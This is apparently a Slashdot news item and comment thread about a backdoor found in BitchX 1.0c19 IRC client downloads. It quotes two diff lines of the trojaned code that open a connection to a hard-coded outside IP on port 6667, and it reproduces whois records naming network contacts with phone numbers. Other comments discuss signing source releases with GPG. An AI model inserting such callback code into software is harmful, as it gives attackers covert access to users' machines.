BitchX 1.0c19 IRC Client Backdoored

JRAC writes "A recent Bugtraq submission has indicated that the popular IRC client, BitchX, contains a backdoor. So far, only certain 1.0c19 files, downloaded from ftp.bitchx.com are reported to contain the malicious code. The BitchX developers have been notified, so hopefully a fix will be issued soon. Looks like irssi wasn't the only one ;)"

Who's this?

[Draoi]

There's an interesting IP address hard-coded into the trojaned code;

+ sa.sin_port = htons (6667);
+ sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);

Doing a reverse-DNS lookup gives;

;; QUERY SECTION:
;; 17.115.77.213.in-addr.arpa, type = ANY, class = IN

;; ANSWER SECTION:
17.115.77.213.in-addr.arpa. 1H IN PTR wenus.dtcomsa.com.

.... so who are they??

Re:The name....

[RealisticWeb.com]

Your not alone by far. My computer (yes even my Linux box) is a family computer, and I refuse to use any software with names or content that is not appropriate for my children to see. Keep in mind that what is "appropriate" is totaly my opinion, and some people would argue with me, but my quesition is: why is this only ever an issue with open source software?

Re:Who's this?

[zdzichu]

inetnum 213.77.115.0 - 213.77.115.255
netname DATACOM
descr Datacom
descr Warszawa Bemowo
country PL
admin-c AW7760-RIPE
tech-c RW7118-RIPE
status ASSIGNED PA
mnt-by AS5617-MNT
changed tkielb@cst.tpsa.pl 20000915
source RIPE

(stupidly formatted because of lamefilter)

Re:Who's this?

[Anonymous Coward]

It's hardly likely to be the owners of that machine that wrote the backdoor. That IP is likely to be somebody elses machine that's been compromised and used by the backdoor creators.

Digitally sign your sources...

[Cyclops]

Many don't digitally sign their sources with a secure key, and thus there is absolutely no way to verify that those sources are the ones the developer intended to release.

Many think that a simple md5sum alongside the sources is enough. IT IS NOT. Any attacker who replaces the sources can as easily replace the md5sum, which can be generated by anyone.

A digital signature (I suggest using gpg) can only be generated by YOU if you keep it in a secure place, and use it to sign the sources. The public side of this key should be widely distributed and preferably signed (that is recognized) by third parties... the most trustworthy these third parties can be, the better.

After the huge attack on the network where such sites as Apache were hosted, other Apache projects which did not sign their packages suddenly started signing them. They got scared. You should be too.

A lot of people instinctively trust their dns resolutions (oops) and also think that if they go to http://www.mozilla.org they will get their favorite browser for sure. They are also wrong. dns can be spoofed under certain conditions, so they could be going to crackersR.us instead, and downloading a neat trojaned source, for instance.

The more a project grows in fame, the more it will become a likely target for these kinds of attacks, so the more need to a degree of responsability that should not be needed, but it unfourtunately is since the danger is ubiquitous.

Be carefull, be very carefull.

Also avoid using user root period.

Re:Who's this?

[Neil Watson]

PL is Poland.

[nwatson@valetta ~]$whois 213.77.115.17
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyri ght.html

inetnum: 213.77.115.0 - 213.77.115.255
netname: DATACOM
descr: Datacom
descr: Warszawa Bemowo
country: PL
admin-c: AW7760-RIPE
tech-c: RW7118-RIPE
status: ASSIGNED PA
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

route: 213.77.0.0/16
descr: TPNET (PL)
descr: Provider Local Registry
origin: AS5617
notify: konradpl@zt.piotrkow.tpsa.pl
mnt-by: AS5617-MNT
changed: konradpl@zt.piotrkow.tpsa.pl 20000728
source: RIPE

person: Arkadiusz Wrobel
address: "DataCOM" S. A.
address: ul Radiowa 21a m20
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 298639
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: AW7760-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

person: Rafal Wrzosek
address: "DataCOM" S. A.
address: ul Kaliskiego 11a /312
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 145187
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: RW7118-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

Yes, someone has most likely compromised the box and is using it for the backdoor. However, the owners of the box are still responsible for the lack of security that allowed their box to be compromised.

Re:GNU/Linux needs signed downloads

[bogado]

RPM does this, and most rpm managers do exactly this (red-carpet for instance). I bet debian has the same type of protection. If you only install software from trusted distributors, you should be fine.

Re:XSS in Slashcode

[jamie]

This post is quite inaccurate and we will be responding, also on bugtraq, momentarily. The author of the post did not contact the Slash development team, or we could have corrected some of his misconceptions.

Re:It's Odd

[frozenray]

A user named uid0 made an excellent point in an usenet thread about the backdoored dsniff/fragroute/fragrouter utilities on monkey.org:

This makes one wonder a question that would be best posed to the community; the purpose of MD5/SHA/etc is to provide unequivocal evidence as to the validity of a piece of data. More often than not, such files are kept in the same, vulnerable, location as the actual data. Clearly one can see the downfall of such a system.

(source [google.com])

Re:The name....

[bmetzler]

It's not really that much of an issue. It would be trivial to go into the BitchX source code, edit the PROGNAME definition, or whatever the equivilent, and make yourself a nice new IRC client named whatever you want.

Yes it is. Unless they've made major changes to the code recently. I tried to patching the code base about a year ago and make a censored version, but the program name is hardcoded in a million places. And once you do find and replace everything, you still have the problem of creating a new patch everytime a new version is released.

-Brent

GNU/Linux HAS signed downloads

[Nailer]

RPM, the standard packaging system according to the Linux Standards base, had support for PGP (IIRC) around three years ago. This was replaced / upgraded to GPG a couple of years ago. Every package in Red Hat Linux (and most other popular distros) is signed (unless someone screws up - there was a case where 2 packages weren't properly signed, but signed replacements were made avaliable soon after). RPM will print a strong warning if the signature isn't correct (and maybe fail the operation - dunno, my signature's have always been correct).

Dpkg also recently added GPG support, buy you have to trust individuals rather than a specific company - no packager is going to lose their job if they're working in Albania on Debian trojaning packages.